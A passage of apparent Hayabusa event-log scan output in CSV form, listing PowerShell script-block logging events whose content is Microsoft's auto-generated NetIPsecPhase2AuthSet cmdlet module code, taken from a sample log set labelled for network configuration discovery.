<Enum EnumName=""NetSecurity.PrimaryStatus"" UnderlyingType=""uint16""> <Value Name=""Unknown"" Value=""0""/> <Value Name=""OK"" Value=""1""/> <Value Name=""Inactive"" Value=""2""/> <Value Name=""Error"" Value=""3""/> </Enum> <Enum EnumName=""NetSecurity.PolicyStoreType"" UnderlyingType=""uint16""> <Value Name=""None"" Value=""0""/> <Value Name=""Local"" Value=""1""/> <Value Name=""GroupPolicy"" Value=""2""/> <Value Name=""Dynamic"" Value=""3""/> <Value Name=""Generated"" Value=""4""/> <Value Name=""Hardcoded"" Value=""5""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPs",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # 